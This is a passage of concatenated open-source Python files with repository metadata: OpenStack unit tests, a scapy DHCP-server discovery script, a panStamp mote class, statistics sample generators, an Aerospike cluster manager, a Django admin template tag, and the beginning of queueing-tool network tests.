nova/tests/unit/api/openstack/compute/test_server_usage.py
|
63
|
5369
|
# Copyright 2013 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import datetime
from oslo_serialization import jsonutils
from oslo_utils import timeutils
from nova import compute
from nova import db
from nova import exception
from nova import objects
from nova.objects import instance as instance_obj
from nova import test
from nova.tests.unit.api.openstack import fakes
from nova.tests.unit import fake_instance
UUID1 = '00000000-0000-0000-0000-000000000001'
UUID2 = '00000000-0000-0000-0000-000000000002'
UUID3 = '00000000-0000-0000-0000-000000000003'
DATE1 = datetime.datetime(year=2013, month=4, day=5, hour=12)
DATE2 = datetime.datetime(year=2013, month=4, day=5, hour=13)
DATE3 = datetime.datetime(year=2013, month=4, day=5, hour=14)
def fake_compute_get(*args, **kwargs):
inst = fakes.stub_instance(1, uuid=UUID3, launched_at=DATE1,
terminated_at=DATE2)
return fake_instance.fake_instance_obj(args[1], **inst)
def fake_compute_get_all(*args, **kwargs):
db_list = [
fakes.stub_instance(2, uuid=UUID1, launched_at=DATE2,
terminated_at=DATE3),
fakes.stub_instance(3, uuid=UUID2, launched_at=DATE1,
terminated_at=DATE3),
]
fields = instance_obj.INSTANCE_DEFAULT_FIELDS
return instance_obj._make_instance_list(args[1],
objects.InstanceList(),
db_list, fields)
class ServerUsageTestV21(test.TestCase):
content_type = 'application/json'
prefix = 'OS-SRV-USG:'
_prefix = "/v2/fake"
def setUp(self):
super(ServerUsageTestV21, self).setUp()
fakes.stub_out_nw_api(self.stubs)
self.stubs.Set(compute.api.API, 'get', fake_compute_get)
self.stubs.Set(compute.api.API, 'get_all', fake_compute_get_all)
self.flags(
osapi_compute_extension=[
'nova.api.openstack.compute.contrib.select_extensions'],
osapi_compute_ext_list=['Server_usage'])
return_server = fakes.fake_instance_get()
self.stubs.Set(db, 'instance_get_by_uuid', return_server)
def _make_request(self, url):
req = fakes.HTTPRequest.blank(url)
req.accept = self.content_type
res = req.get_response(self._get_app())
return res
def _get_app(self):
return fakes.wsgi_app_v21(init_only=('servers', 'os-server-usage'))
def _get_server(self, body):
return jsonutils.loads(body).get('server')
def _get_servers(self, body):
return jsonutils.loads(body).get('servers')
def assertServerUsage(self, server, launched_at, terminated_at):
resp_launched_at = timeutils.parse_isotime(
server.get('%slaunched_at' % self.prefix))
self.assertEqual(timeutils.normalize_time(resp_launched_at),
launched_at)
resp_terminated_at = timeutils.parse_isotime(
server.get('%sterminated_at' % self.prefix))
self.assertEqual(timeutils.normalize_time(resp_terminated_at),
terminated_at)
def test_show(self):
url = self._prefix + ('/servers/%s' % UUID3)
res = self._make_request(url)
self.assertEqual(res.status_int, 200)
now = timeutils.utcnow()
timeutils.set_time_override(now)
self.assertServerUsage(self._get_server(res.body),
launched_at=DATE1,
terminated_at=DATE2)
def test_detail(self):
url = self._prefix + '/servers/detail'
res = self._make_request(url)
self.assertEqual(res.status_int, 200)
servers = self._get_servers(res.body)
self.assertServerUsage(servers[0],
launched_at=DATE2,
terminated_at=DATE3)
self.assertServerUsage(servers[1],
launched_at=DATE1,
terminated_at=DATE3)
def test_no_instance_passthrough_404(self):
def fake_compute_get(*args, **kwargs):
raise exception.InstanceNotFound(instance_id='fake')
self.stubs.Set(compute.api.API, 'get', fake_compute_get)
url = self._prefix + '/servers/70f6db34-de8d-4fbd-aafb-4065bdfa6115'
res = self._make_request(url)
self.assertEqual(res.status_int, 404)
class ServerUsageTestV20(ServerUsageTestV21):
def setUp(self):
super(ServerUsageTestV20, self).setUp()
self.flags(
osapi_compute_extension=[
'nova.api.openstack.compute.contrib.select_extensions'],
osapi_compute_ext_list=['Server_usage'])
def _get_app(self):
return fakes.wsgi_app(init_only=('servers',))
|
apache-2.0
|
julianwang/cinder
|
cinder/tests/unit/db/test_qos_specs.py
|
6
|
9241
|
# Copyright (C) 2013 eBay Inc.
# Copyright (C) 2013 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Tests for quality_of_service_specs table."""
import time
from oslo_log import log as logging
from cinder import context
from cinder import db
from cinder import exception
from cinder import test
from cinder.volume import volume_types
LOG = logging.getLogger(__name__)
def fake_qos_specs_get_by_name(context, name, session=None, inactive=False):
pass
class QualityOfServiceSpecsTableTestCase(test.TestCase):
"""Test case for QualityOfServiceSpecs model."""
def setUp(self):
super(QualityOfServiceSpecsTableTestCase, self).setUp()
self.ctxt = context.RequestContext(user_id='user_id',
project_id='project_id',
is_admin=True)
def _create_qos_specs(self, name, values=None):
"""Create a transfer object."""
if values:
specs = dict(name=name, qos_specs=values)
else:
specs = {'name': name,
'qos_specs': {
'consumer': 'back-end',
'key1': 'value1',
'key2': 'value2'}}
return db.qos_specs_create(self.ctxt, specs)['id']
def test_qos_specs_create(self):
        # If a qos specs entry with the same name already exists,
        # a QoSSpecsExists exception will be raised.
name = 'QoSSpecsCreationTest'
self._create_qos_specs(name)
self.assertRaises(exception.QoSSpecsExists,
db.qos_specs_create, self.ctxt, dict(name=name))
specs_id = self._create_qos_specs('NewName')
query_id = db.qos_specs_get_by_name(
self.ctxt, 'NewName')['id']
self.assertEqual(specs_id, query_id)
def test_qos_specs_get(self):
value = dict(consumer='front-end',
key1='foo', key2='bar')
specs_id = self._create_qos_specs('Name1', value)
fake_id = 'fake-UUID'
self.assertRaises(exception.QoSSpecsNotFound,
db.qos_specs_get, self.ctxt, fake_id)
specs = db.qos_specs_get(self.ctxt, specs_id)
expected = dict(name='Name1', id=specs_id, consumer='front-end')
del value['consumer']
expected.update(dict(specs=value))
self.assertDictMatch(specs, expected)
def test_qos_specs_get_all(self):
value1 = dict(consumer='front-end',
key1='v1', key2='v2')
value2 = dict(consumer='back-end',
key3='v3', key4='v4')
value3 = dict(consumer='back-end',
key5='v5', key6='v6')
spec_id1 = self._create_qos_specs('Name1', value1)
spec_id2 = self._create_qos_specs('Name2', value2)
spec_id3 = self._create_qos_specs('Name3', value3)
specs = db.qos_specs_get_all(self.ctxt)
self.assertEqual(len(specs), 3,
"Unexpected number of qos specs records")
expected1 = dict(name='Name1', id=spec_id1, consumer='front-end')
expected2 = dict(name='Name2', id=spec_id2, consumer='back-end')
expected3 = dict(name='Name3', id=spec_id3, consumer='back-end')
del value1['consumer']
del value2['consumer']
del value3['consumer']
expected1.update(dict(specs=value1))
expected2.update(dict(specs=value2))
expected3.update(dict(specs=value3))
self.assertIn(expected1, specs)
self.assertIn(expected2, specs)
self.assertIn(expected3, specs)
def test_qos_specs_get_by_name(self):
name = str(int(time.time()))
value = dict(consumer='front-end',
foo='Foo', bar='Bar')
specs_id = self._create_qos_specs(name, value)
specs = db.qos_specs_get_by_name(self.ctxt, name)
del value['consumer']
expected = {'name': name,
'id': specs_id,
'consumer': 'front-end',
'specs': value}
self.assertDictMatch(specs, expected)
def test_qos_specs_delete(self):
name = str(int(time.time()))
specs_id = self._create_qos_specs(name)
db.qos_specs_delete(self.ctxt, specs_id)
self.assertRaises(exception.QoSSpecsNotFound, db.qos_specs_get,
self.ctxt, specs_id)
def test_qos_specs_item_delete(self):
name = str(int(time.time()))
value = dict(consumer='front-end',
foo='Foo', bar='Bar')
specs_id = self._create_qos_specs(name, value)
del value['consumer']
del value['foo']
expected = {'name': name,
'id': specs_id,
'consumer': 'front-end',
'specs': value}
db.qos_specs_item_delete(self.ctxt, specs_id, 'foo')
specs = db.qos_specs_get_by_name(self.ctxt, name)
self.assertDictMatch(specs, expected)
def test_associate_type_with_qos(self):
self.assertRaises(exception.VolumeTypeNotFound,
db.volume_type_qos_associate,
self.ctxt, 'Fake-VOLID', 'Fake-QOSID')
type_id = volume_types.create(self.ctxt, 'TypeName')['id']
specs_id = self._create_qos_specs('FakeQos')
db.volume_type_qos_associate(self.ctxt, type_id, specs_id)
res = db.qos_specs_associations_get(self.ctxt, specs_id)
self.assertEqual(len(res), 1)
self.assertEqual(res[0]['id'], type_id)
self.assertEqual(res[0]['qos_specs_id'], specs_id)
def test_qos_associations_get(self):
self.assertRaises(exception.QoSSpecsNotFound,
db.qos_specs_associations_get,
self.ctxt, 'Fake-UUID')
type_id = volume_types.create(self.ctxt, 'TypeName')['id']
specs_id = self._create_qos_specs('FakeQos')
res = db.qos_specs_associations_get(self.ctxt, specs_id)
self.assertEqual(len(res), 0)
db.volume_type_qos_associate(self.ctxt, type_id, specs_id)
res = db.qos_specs_associations_get(self.ctxt, specs_id)
self.assertEqual(len(res), 1)
self.assertEqual(res[0]['id'], type_id)
self.assertEqual(res[0]['qos_specs_id'], specs_id)
type0_id = volume_types.create(self.ctxt, 'Type0Name')['id']
db.volume_type_qos_associate(self.ctxt, type0_id, specs_id)
res = db.qos_specs_associations_get(self.ctxt, specs_id)
self.assertEqual(len(res), 2)
self.assertEqual(res[0]['qos_specs_id'], specs_id)
self.assertEqual(res[1]['qos_specs_id'], specs_id)
def test_qos_specs_disassociate(self):
type_id = volume_types.create(self.ctxt, 'TypeName')['id']
specs_id = self._create_qos_specs('FakeQos')
db.volume_type_qos_associate(self.ctxt, type_id, specs_id)
res = db.qos_specs_associations_get(self.ctxt, specs_id)
self.assertEqual(res[0]['id'], type_id)
self.assertEqual(res[0]['qos_specs_id'], specs_id)
db.qos_specs_disassociate(self.ctxt, specs_id, type_id)
res = db.qos_specs_associations_get(self.ctxt, specs_id)
self.assertEqual(len(res), 0)
res = db.volume_type_get(self.ctxt, type_id)
self.assertIsNone(res['qos_specs_id'])
def test_qos_specs_disassociate_all(self):
specs_id = self._create_qos_specs('FakeQos')
type1_id = volume_types.create(self.ctxt, 'Type1Name')['id']
type2_id = volume_types.create(self.ctxt, 'Type2Name')['id']
type3_id = volume_types.create(self.ctxt, 'Type3Name')['id']
db.volume_type_qos_associate(self.ctxt, type1_id, specs_id)
db.volume_type_qos_associate(self.ctxt, type2_id, specs_id)
db.volume_type_qos_associate(self.ctxt, type3_id, specs_id)
res = db.qos_specs_associations_get(self.ctxt, specs_id)
self.assertEqual(len(res), 3)
db.qos_specs_disassociate_all(self.ctxt, specs_id)
res = db.qos_specs_associations_get(self.ctxt, specs_id)
self.assertEqual(len(res), 0)
def test_qos_specs_update(self):
name = 'FakeName'
specs_id = self._create_qos_specs(name)
value = dict(key2='new_value2', key3='value3')
self.assertRaises(exception.QoSSpecsNotFound, db.qos_specs_update,
self.ctxt, 'Fake-UUID', value)
db.qos_specs_update(self.ctxt, specs_id, value)
specs = db.qos_specs_get(self.ctxt, specs_id)
self.assertEqual(specs['specs']['key2'], 'new_value2')
self.assertEqual(specs['specs']['key3'], 'value3')
|
apache-2.0
|
rthallisey/clapper
|
dhcp-test/test-pacemaker-networks.py
|
2
|
1263
|
import sys
from scapy.all import *
import ipaddress
def find_dhcp_servers():
conf.checkIPaddr = False
fam, hw = get_if_raw_hwaddr(conf.iface)
dhcp_discover = (Ether(dst="ff:ff:ff:ff:ff:ff") /
IP(src="0.0.0.0", dst="255.255.255.255") /
UDP(sport=68, dport=67) /
BOOTP(chaddr=hw) /
DHCP(options=[("message-type", "discover"), "end"]))
ans, unans = srp(dhcp_discover, multi=True, timeout=10)
return [(unicode(packet[1][IP].src), packet[1][Ether].src)
for packet in ans]
if __name__ == '__main__':
result = 0
pacemaker_networks = [ipaddress.ip_network(unicode(net))
for net in sys.argv[1:]]
print "Looking for DHCP servers:"
dhcp_servers = find_dhcp_servers()
if len(dhcp_servers) > 0:
print "\nFound DHCP servers:\n"
for i, (ip, mac) in enumerate(dhcp_servers):
print "%d. %s (mac: %s)" % (i + 1, ip, mac)
for network in pacemaker_networks:
if network.overlaps(ipaddress.ip_network(ip)):
print "\tOverlaps with network %s" % network
result = 1
else:
print "No DHCP servers found."
sys.exit(result)
|
apache-2.0
|
ekoeppen/panstamp-python
|
pyswap/src/swap/protocol/SwapMote.py
|
3
|
10123
|
#########################################################################
#
# SwapMote
#
# Copyright (c) 2011 panStamp <[email protected]>
#
# This file is part of the panStamp project.
#
# panStamp is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# any later version.
#
# panStamp is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with panStamp; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301
# USA
#
# Author: Daniel Berenguer
# Creation date: 20-Aug-2011
#
#########################################################################
__author__="Daniel Berenguer"
__date__ ="$Aug 20, 2011 10:36:00 AM$"
#########################################################################
from SwapPacket import SwapStatusPacket, SwapCommandPacket, SwapQueryPacket
from SwapDefs import SwapRegId, SwapState
from SwapValue import SwapValue
from swap.SwapException import SwapException
from swap.xmltools.XmlDevice import XmlDevice
import time
class SwapMote(object):
"""
SWAP mote class
"""
def cmdRegister(self, regId, value):
"""
Send command to register and return expected response
@param regId: Register ID
@param value: New value
@return Expected SWAP status packet sent from mote after reception of this command
"""
# Expected response from mote
infPacket = SwapStatusPacket(self.address, regId, value)
# Command to be sent to the mote
cmdPacket = SwapCommandPacket(self.address, regId, value, self.nonce)
# Send command
cmdPacket.send(self.server)
# Return expected response
        return infPacket
def qryRegister(self, regId):
"""
Send query to register
@param regId: Register ID
"""
# Query packet to be sent
qryPacket = SwapQueryPacket(self.address, regId)
# Send query
qryPacket.send(self.server)
def staRegister(self, regId):
"""
Send SWAP status packet about the current value of the register passed as argument
@param regId: Register ID
"""
# Get register
reg = self.getRegister(regId)
# Status packet to be sent
infPacket = SwapStatusPacket(self.address, regId, reg.value)
# Send SWAP status packet
infPacket.send(self.server)
def cmdRegisterWack(self, regId, value):
"""
Send SWAP command to remote register and wait for confirmation
@param regId: Register ID
@param value: New value
@return True if ACK is received from mote. Return False otherwise
"""
return self.server.setMoteRegister(self, regId, value)
def setAddress(self, address):
"""
Set mote address
@param address: New mote address
@return True if this command is confirmed from the mote. Return False otherwise
"""
val = SwapValue(address, length=1)
return self.cmdRegisterWack(SwapRegId.ID_DEVICE_ADDR, val)
def setNetworkId(self, netId):
"""
Set mote's network id. Return true if ACK received from mote
@param netId: New Network ID
@return True if this command is confirmed from the mote. Return False otherwise
"""
val = SwapValue(netId, length=2)
return self.cmdRegisterWack(SwapRegId.ID_NETWORK_ID, val)
def setFreqChannel(self, channel):
"""
Set mote's frequency channel. Return true if ACK received from mote
@param channel: New frequency channel
@return True if this command is confirmed from the mote. Return False otherwise
"""
val = SwapValue(channel, length=1)
return self.cmdRegisterWack(SwapRegId.ID_FREQ_CHANNEL, val)
def setSecurity(self, secu):
"""
Set mote's security option. Return true if ACK received from mote
@param secu: Security option
@return True if this command is confirmed from the mote. Return False otherwise
"""
val = SwapValue(secu, length=1)
return self.cmdRegisterWack(SwapRegId.ID_SECU_OPTION, val)
def setTxInterval(self, interval):
"""
Set periodic Tx interval. Return true if ACK received from mote
@param interval: New Tx interval
@return True if this command is confirmed from the mote. Return False otherwise
"""
val = SwapValue(interval, length=2)
return self.cmdRegisterWack(SwapRegId.ID_TX_INTERVAL, val)
def restart(self):
"""
Ask mote to restart
@return True if this command is confirmed from the mote. Return False otherwise
"""
val = SwapValue(SwapState.RESTART, length=1)
return self.cmdRegisterWack(SwapRegId.ID_SYSTEM_STATE, val)
def leaveSync(self):
"""
Ask mote to leave SYNC mode (RXON state)
@return True if this command is confirmed from the mote. Return False otherwise
"""
val = SwapValue(SwapState.RXOFF, length=1)
return self.cmdRegisterWack(SwapRegId.ID_SYSTEM_STATE, val)
def updateTimeStamp(self):
"""
Update time stamp
"""
self.timestamp = time.time()
def getRegister(self, regId):
"""
Get register given its ID
@param regId: Register ID
@return SwapRegister object
"""
# Regular registers
for reg in self.regular_registers:
if reg.id == regId:
return reg
# Configuration registers
for reg in self.config_registers:
if reg.id == regId:
return reg
return None
def getParameter(self, name):
"""
Get parameter given its name
@param name: name of the parameter belonging to this mote
@return: SwapParam object
"""
# Regular registers
for reg in self.regular_registers:
for param in reg.parameters:
if param.name == name:
return param
# Configuration registers
for reg in self.config_registers:
for param in reg.parameters:
if param.name == name:
return param
return None
def dumps(self, include_units=False):
"""
Serialize mote data to a JSON formatted string
@param include_units: if True, include list of units for each endpoint
within the serialized output
"""
data = {}
data["pcode"] = self.product_code
data["manufacturer"] = self.definition.manufacturer
data["name"] = self.definition.product
data["address"] = self.address
regs = []
try:
for reg in self.regular_registers:
regs.append(reg.dumps(include_units))
except SwapException:
raise
data["registers"] = regs
return data
def __init__(self, server=None, product_code=None, address=0xFF, security=0, nonce=0):
"""
Class constructor
@param server: SWAP server object
@param product_code: Product Code
@param address: Mote address
"""
if server is None:
raise SwapException("SwapMote constructor needs a valid SwapServer object")
## Swap server object
self.server = server
## Product code
self.product_code = product_code
## Product ID
self.product_id = 0
## Manufacturer ID
self.manufacturer_id = 0
## Definition settings
self.config = None
# Get manufacturer and product id from product code
"""
if product_code is not None:
for i in range(4):
self.manufacturer_id = self.manufacturer_id | (product_code[i] << 8 * (3-i))
self.product_id = self.product_id | (product_code[i + 4] << 8 * (3-i))
"""
try:
self.manufacturer_id = long(product_code[0:8], 16)
self.product_id = long(product_code[8:], 16)
except:
raise SwapException("Incorrect product code received")
# Definition file
## Definition settings
try:
self.definition = XmlDevice(self)
except:
raise
## Device address
self.address = address
## Security option
self.security = security
## Current mote's security nonce
self.nonce = nonce
## State of the mote
self.state = SwapState.RXOFF
## List of regular registers provided by this mote
self.regular_registers = None
## List of config registers provided by this mote
self.config_registers = None
if self.definition is not None:
# List of regular registers
self.regular_registers = self.definition.getRegList()
# List of config registers
self.config_registers = self.definition.getRegList(config=True)
## Time stamp of the last update received from mote
self.timestamp = time.time()
## Powerdown mode
self.pwrdownmode = self.definition.pwrdownmode
## Interval between periodic transmissions
self.txinterval = self.definition.txinterval
|
gpl-2.0
|
myuuuuun/ThinkStats2-Notebook
|
code/mystery.py
|
68
|
1578
|
"""This file contains code used in "Think Stats",
by Allen B. Downey, available from greenteapress.com
Copyright 2014 Allen B. Downey
License: GNU GPLv3 http://www.gnu.org/licenses/gpl.html
"""
from __future__ import print_function
import random
import numpy as np
import scipy.stats
def write_sample(sample, filename):
"""Write a sequence of floats to a file.
"""
fp = open(filename, 'w')
for x in sample:
fp.write('%f\n' % x)
fp.close()
def uniform_sample(n):
return [random.uniform(0, 100) for i in range(n)]
def triangular_sample(n):
return [random.triangular(0, 100) for i in range(n)]
def expo_sample(n):
return [random.expovariate(1.0/50) for i in range(n)]
def gauss_sample(n):
return [random.gauss(50, 25) for i in range(n)]
def lognorm_sample(n):
return [random.lognormvariate(3, 1.3) for i in range(n)]
def pareto_sample(n):
return [10 * random.paretovariate(1.2) for i in range(n)]
def weibull_sample(n):
return [random.weibullvariate(60, 5) for i in range(n)]
def gumbel_sample(n):
rv = scipy.stats.gumbel_r(45, 10)
return rv.rvs(n)
def main():
funcs = [uniform_sample, triangular_sample, expo_sample,
gauss_sample, lognorm_sample, pareto_sample,
weibull_sample, gumbel_sample]
for i in range(len(funcs)):
sample = funcs[i](1000)
print(np.mean(sample))
filename = 'mystery%d.dat' % i
write_sample(sample, filename)
if __name__ == '__main__':
main()
|
gpl-2.0
|
PavanGupta01/aerospike-admin
|
lib/cluster.py
|
1
|
9431
|
# Copyright 2013-2014 Aerospike, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http:#www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from lib import citrusleaf
from lib import util
from lib.node import Node
from lib.prefixdict import PrefixDict
import re
class Cluster(object):
# Kinda like a singleton... All instantiated classes will share the same
    # state... This effectively makes the class a Borg: every instance
    # operates on the same shared cluster state.
cluster_state = {}
def __init__(self, seed_nodes, use_telnet=False, user=None, password=None):
"""
Want to be able to support multiple nodes on one box (for testing)
seed_nodes should be the form (address,port) address can be fqdn or ip.
"""
self.__dict__ = self.cluster_state
if self.cluster_state != {}:
return
# will we connect using telnet port?
self.use_telnet = use_telnet
self.user = user
self.password = password
# self.nodes is a dict from Node ID -> Node objects
self.nodes = {}
# self.node_lookup is a dict of (fqdn, port) -> Node
# and (ip, port) -> Node, and node.node_id -> Node
self.node_lookup = PrefixDict()
self._original_seed_nodes = set(seed_nodes)
self._seed_nodes = set(seed_nodes)
self._live_nodes = set()
# crawl the cluster search for nodes in addition to the seed nodes.
self._enable_crawler = True
self._crawl()
def __str__(self):
nodes = self.nodes.values()
online = [n.key for n in filter(lambda n: n.alive, nodes)]
offline = [n.key for n in filter(lambda n: not n.alive, nodes)]
retval = "Found %s nodes"%(len(nodes))
if online:
retval += "\nOnline: %s"%(", ".join(online))
if offline:
retval += "\nOffline: %s"%(", ".join(offline))
return retval
def getPrefixes(self):
prefixes = {}
for node_key, node in self.nodes.iteritems():
fqdn = node.sockName(use_fqdn=True)
prefixes[node_key] = self.node_lookup.getPrefix(fqdn)
return prefixes
def getExpectedPrincipal(self):
try:
return max([n.node_id for n in self.nodes.itervalues()])
except:
return ''
def getVisibility(self):
return self._live_nodes
def _shouldCrawl(self):
"""
Determine if we need to do a crawl.
We crawl if the union of all services lists is not equal to the set
        of nodes that this tool perceives as alive.
"""
if not self._enable_crawler:
return False
self._enable_crawler = False
current_services = set()
self._refreshNodeLiveliness()
try:
            infoservices = self.infoServices().values()
            for s in infoservices:
if isinstance(s, Exception):
continue
current_services |= set(s)
if current_services and current_services == self._live_nodes:
# services have not changed, do not crawl
                # if services are empty we crawl regardless
return False
else:
# services have changed
return True
except IOError:
            # We aren't connected yet, definitely crawl.
return True
finally:
# Re-enable crawler before exiting
self._enable_crawler = True
def _crawl(self):
"""
Find all the nodes in the cluster and add them to self.nodes.
"""
if not self._shouldCrawl():
return
self._enable_crawler = False
try:
if self._seed_nodes:
seed_nodes = self._seed_nodes
else:
seed_nodes = self._original_seed_nodes
# clear the current lookup and node list
all_services = set()
visited = set()
unvisited = set(seed_nodes)
while unvisited - visited:
l_unvisited = list(unvisited)
nodes = util.concurrent_map(self._registerNode, l_unvisited)
live_nodes = filter(
lambda n: n is not None and n.alive and n not in visited
, nodes)
visited |= unvisited
unvisited.clear()
services_list = util.concurrent_map(self._getServices, live_nodes)
for node, services in zip(live_nodes, services_list):
if isinstance(services, Exception):
continue
all_services.update(set(services))
all_services.add((node.ip, node.port))
unvisited = all_services - visited
if all_services:
self._seed_nodes = all_services
self._refreshNodeLiveliness()
except:
pass
finally:
self._enable_crawler = True
def _refreshNodeLiveliness(self):
live_nodes = filter(lambda n: n.alive, self.nodes.itervalues())
self._live_nodes.clear()
self._live_nodes.update(map(lambda n: (n.ip, n.port), live_nodes))
def updateNode(self, node):
self.nodes[node.key] = node
# add node to lookup
self.node_lookup[node.sockName(use_fqdn = True)] = node
self.node_lookup[node.sockName()] = node
if node.alive:
self.node_lookup[node.node_id] = node
def getNode(self, node):
return self.node_lookup[node]
def _registerNode(self, ip_port):
"""
Instantiate and return a new node
If cannot instantiate node, return None.
Creates a new node if:
1) node.key doesn't already exist
2) node.key exists but existing node is not alive
"""
try:
ip, port = ip_port
except Exception as e:
print "ip_port is expected to be a tuple of len 2, " + \
"instead it is of type %s and str value of %s"%(type(ip_port)
, str(ip_port))
return None
try:
node_key = Node.createKey(ip, port)
if node_key in self.nodes:
existing = self.nodes[node_key]
else:
existing = None
if not existing or not existing.alive:
new_node = Node(ip
, port
, use_telnet=self.use_telnet
, user=self.user
, password=self.password)
if existing and not new_node.alive:
new_node = existing
self.updateNode(new_node)
return new_node
except:
return None
def _getServices(self, node):
"""
Given a node object return its services list
"""
services = node.infoServicesAlumni()
if services:
return services
return node.infoServices() # compatible for version without alumni
def _callNodeMethod(self, nodes, method_name, *args, **kwargs):
"""
Run a particular method command across a set of nodes
nodes is a list of nodes to to run the command against.
if nodes is None then we run on all nodes.
"""
self._crawl()
if nodes == 'all':
use_nodes = self.nodes.values()
elif type(nodes) == list:
use_nodes = []
for n in nodes:
try:
node_list = self.getNode(n)
if isinstance(node_list, list):
use_nodes.extend(self.getNode(n))
else:
use_nodes.append(self.getNode(n))
except: # Ignore ambiguous and key errors
continue
else:
raise TypeError(
"nodes should be 'all' or list found %s"%type(nodes))
if len(use_nodes) == 0:
raise IOError('Unable to find any Aerospike nodes')
return dict(
util.concurrent_map(
lambda node:
(node.key, getattr(node, method_name)(*args, **kwargs)),
use_nodes))
def isXDREnabled(self, nodes = 'all'):
return self._callNodeMethod(nodes, 'isXDREnabled')
def __getattr__(self, name):
regex = re.compile("^info.*$|^xdr.*$")
if regex.match(name):
def infoFunc(*args, **kwargs):
if 'nodes' not in kwargs:
nodes = 'all'
else:
nodes = kwargs['nodes']
del(kwargs['nodes'])
return self._callNodeMethod(nodes, name, *args, **kwargs)
return infoFunc
else:
raise AttributeError("Cluster has not attribute '%s'"%(name))
|
apache-2.0
|
ridfrustum/lettuce
|
tests/integration/lib/Django-1.2.5/django/contrib/admin/templatetags/log.py
|
310
|
2270
|
from django import template
from django.contrib.admin.models import LogEntry
register = template.Library()
class AdminLogNode(template.Node):
def __init__(self, limit, varname, user):
self.limit, self.varname, self.user = limit, varname, user
def __repr__(self):
return "<GetAdminLog Node>"
def render(self, context):
if self.user is None:
context[self.varname] = LogEntry.objects.all().select_related('content_type', 'user')[:self.limit]
else:
user_id = self.user
if not user_id.isdigit():
user_id = context[self.user].id
context[self.varname] = LogEntry.objects.filter(user__id__exact=user_id).select_related('content_type', 'user')[:self.limit]
return ''
class DoGetAdminLog:
"""
Populates a template variable with the admin log for the given criteria.
Usage::
{% get_admin_log [limit] as [varname] for_user [context_var_containing_user_obj] %}
Examples::
{% get_admin_log 10 as admin_log for_user 23 %}
{% get_admin_log 10 as admin_log for_user user %}
{% get_admin_log 10 as admin_log %}
Note that ``context_var_containing_user_obj`` can be a hard-coded integer
(user ID) or the name of a template context variable containing the user
object whose ID you want.
"""
def __init__(self, tag_name):
self.tag_name = tag_name
def __call__(self, parser, token):
tokens = token.contents.split()
if len(tokens) < 4:
raise template.TemplateSyntaxError("'%s' statements require two arguments" % self.tag_name)
if not tokens[1].isdigit():
raise template.TemplateSyntaxError("First argument in '%s' must be an integer" % self.tag_name)
if tokens[2] != 'as':
raise template.TemplateSyntaxError("Second argument in '%s' must be 'as'" % self.tag_name)
if len(tokens) > 4:
if tokens[4] != 'for_user':
raise template.TemplateSyntaxError("Fourth argument in '%s' must be 'for_user'" % self.tag_name)
return AdminLogNode(limit=tokens[1], varname=tokens[3], user=(len(tokens) > 5 and tokens[5] or None))
register.tag('get_admin_log', DoGetAdminLog('get_admin_log'))
|
gpl-3.0
|
djordon/queueing-tool
|
tests/test_network.py
|
1
|
18249
|
import os
import unittest
try:
import unittest.mock as mock
except ImportError:
import mock
try:
import matplotlib.pyplot as plt
HAS_MATPLOTLIB = True
except ImportError:
HAS_MATPLOTLIB = False
import networkx as nx
import numpy as np
import queueing_tool as qt
TRAVIS_TEST = os.environ.get('TRAVIS_TEST', False)
class TestQueueNetwork(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.g = qt.generate_pagerank_graph(200)
cls.qn = qt.QueueNetwork(cls.g)
cls.qn.g.draw_graph = mock.MagicMock()
cls.qn.max_agents = 2000
cls.qn.initialize(50)
def tearDown(self):
self.qn.clear()
self.qn.initialize(50)
def test_QueueNetwork_accounting(self):
num_events = 2500
ans = np.zeros(num_events, bool)
na = np.zeros(self.qn.nE, int)
for q in self.qn.edge2queue:
na[q.edge[2]] = len(q._arrivals) + len(q._departures) + len(q.queue) - 2
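        # The "- 2" above presumably discounts the two sentinel entries each
        # queue keeps in its _arrivals and _departures heaps, so `na`
        # approximates the number of real agents at each edge (an assumption
        # based on the expression, not on queueing_tool documentation).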
for k in range(num_events):
ans[k] = (self.qn.num_agents == na).all()
self.qn.simulate(n=1)
for q in self.qn.edge2queue:
na[q.edge[2]] = len(q._arrivals) + len(q._departures) + len(q.queue) - 2
self.assertTrue(ans.all())
def test_QueueNetwork_add_arrival(self):
adj = {0: [1], 1: [2, 3]}
g = qt.adjacency2graph(adj)
qn = qt.QueueNetwork(g)
mat = qt.generate_transition_matrix(g)
qn.set_transitions(mat)
qn.initialize(edges=(0, 1))
qn.start_collecting_data(edge=[(1, 2), (1, 3)])
qn.simulate(150000)
data = qn.get_queue_data(edge=[(1, 2), (1, 3)])
e0, e1 = qn.out_edges[1]
p0 = np.sum(data[:, 5] == e0, dtype=float) / data.shape[0]
p1 = np.sum(data[:, 5] == e1, dtype=float) / data.shape[0]
trans = qn.transitions(False)
self.assertAlmostEqual(trans[1][2], p0, 2)
self.assertAlmostEqual(trans[1][3], p1, 2)
def test_QueueNetwork_animate(self):
if not HAS_MATPLOTLIB:
with mock.patch('queueing_tool.network.queue_network.plt.show'):
self.qn.animate(frames=5)
else:
